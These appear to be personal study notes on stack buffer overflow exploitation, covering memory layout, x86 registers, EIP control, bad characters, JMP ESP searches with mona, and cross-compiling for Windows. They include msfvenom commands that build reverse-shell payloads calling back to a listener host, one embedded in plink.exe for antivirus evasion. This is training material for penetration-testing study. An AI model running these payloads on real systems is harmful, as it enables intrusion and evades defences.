+----------------------+
| Kernel space | Not Writeable
+----------------------+ 0xc0000000
| + |
| Stack | | RLIMIT_STACK
| v |
+----------------------+
| Memory Mapping |
| Segment |
+----------------------+
| | Program Break
| ^ | (brk)
| Heap | |
| + |
| | start_brk
+----------------------+
| BSS Segment |
+----------------------+
| | end_data
| Data Segment |
| | start_data
+----------------------+
| | end_code
| Text Segment | Binary Code
| |
+----------------------+0x08048000
+----------------------+0x00000000
Phrack – Smashing The Stack For Fun And Profit
SFP – Position in Stack before local Buffer starts. Used as relative location.
Table of Contents
Intel Registers
+-----+-----+-----+--------------------------------
| 16b | 32b | 64b | Description
+-----+-----+-----+--------------------------------
| SP | ESP | RSP | Stack Pointer (SP)
| IP | EIP | RIP | Instruction Pointer
| BP | EBP | RBP | Base Pointer (SFP)
| AX | EAX | RAX | Accumulator Register
| BX | EBX | RBX | Base Register
| CX | ECX | RCX | Counter Register
| DX | EDX | RDX | Data Register
| SI | ESI | RSI | Source Index
| DI | EDI | RDI | Destination Index
| w | s | N/A | register suffix (r8-15)
$
– Literal Number
Stack Exploitation
The stack is used to,
- dynamically allocate the local variables used in functions
- pass parameters to the functions
- return values from the function
<---- vars added in this direction (pushed) -----
--- Data added to var -->
[ stack frame ] [ Funct Args ]
top of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF bottom of
stack 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF stack
(lower buffer SFP RET a b c (high
memory) (EBP) memory
Value) [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03] value)
^
|--ESP
-
Stack frame – contains a function’s parameters: local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call.
-
Depending on the implementation the stack will either grow down (towards lower memory addresses), or up. In our examples we’ll use a stack that grows down. This is the way the stack grows on many computers including the Intel, Motorola, SPARC and MIPS processors.
-
The stack pointer (SP) is also implementation dependent.
- It may point to the last address on the stack, or to the next free available address after the stack.
-
Memory can only be addressed in multiples of the word size.
- A word in our case is 4 bytes, or 32 bits
function calling
- PUSH function paramters into the stack
- CALL function, this pushed the RETURN address onto the stack
- PUSH EBP (frame pointer) onto the stack, EBP of calling function
- copy ESP into EBP, set EBP of called function
- Do things
- COPY EBP into ESP
- POP EBP, restor old EBP
- POP RET Address in EIP
call_swap:
pushl $var ; 1.
call swap ; 2.
swap:
push %ebp ; 3. Setup
movl %esp, %ebp ; 4.
... ; 5. Body
movl %ebp, %esp ; 6. Finish
popl %ebp ; 7.
ret ; 8.
leave
instruction – is mov %ebp,%esp
and pop %ebp
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
– nasm shell
root@kali:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >
EIP
- EIP is important to take control of it controls the program flow
- Two methods to find where the 4 bytes that overwrite the EIP
- binary tree analysis, keep splitting string until the mathcing 4 bytes are found
- Create a uniquie string and find those 4 bytes in the string
pattern_create.rb -l len
– part of metasploit that can create this kind of stringpattern_offset.rb -l len -q valueinhex
– find where hex value is located in string
Shell code
Bad Charaters – characters that should not be included in shell code
00
– null byte, can be used to terminate strings
0D
– carrage return
0A
– Line feed
There are more and can be tested to see how they interact with the target. Sending a payload that includes all chars and seeing what gets filtered or ends the loading of the string
using padding 0xCC
can be used to set a debug TRAP
shell-storm | Shellcodes Database
msfvenom
How to use msfvenom · rapid7/metasploit-framework Wiki · GitHub
Complete How to Guide for MSFvenom
MSFvenom – Metasploit Unleashed
Metasploit Payload cheatsheet
msfvenom -l payloads
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.180 LPORT=4444 EXITFUNC=thread -f python -b \x00\x0a\x0d
-a x86
– 32bit arch
--platform windows
– set platform
- a decoding route is added to the shell code to translate the encoded code back
- decoder needs from space at the begining of the shell code to allow for some working space for the decoder to work in
Windows buffer overflow
- Reverse shell payload: 350 – 400 bytes of spaces
- shell code can live in space after the EIP the ESP should point here
- Look for addresses in in memory that point to
JMP ESP
in statically linked libraries
Immunity debugger
!mona modules
– Show loaded dlls
Look for memory addresses that do not include bad chars and does not have ASLR or DEP enabled
nasm_shell.rp
can be used to translate assembly to byte codes
!mona find -s "\xff\xe4" -m slmfc.dll
– find all JMP ESP op codes
F2
place break point
- may need to seach twice due to bugs
"e" in menu shows module list
Embedding exploit
- You can embed a payload in a Windows PE binary
- This is useful for AV evasion
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_emebeded.exe
-x
source binary-o
output file-i
interations, number of times to encode the payload
Cross compiling to windows from linux
sudo apt-get install mingw-w64
# C
i686-w64-mingw32-gcc hello.c -o hello32.exe # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe # 64-bit
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe # 64-bit
Cross Compile to Windows From Linux | ArrayFire
- run windows bin with
wine
Customizing and Fixing Exploits – 646.c – Cross compiling with mingw32 – Offensive Security Forums
HEAP exploitation
-
dynamically allocated
-
allocated/dealocated in C using
malloc
calloc
realloc
free
-
allocated/dealocated in C++
new
delete
-
memory not dynamically released, must be manually released
-
pointers to heap allocation stored in pointer variable in stack.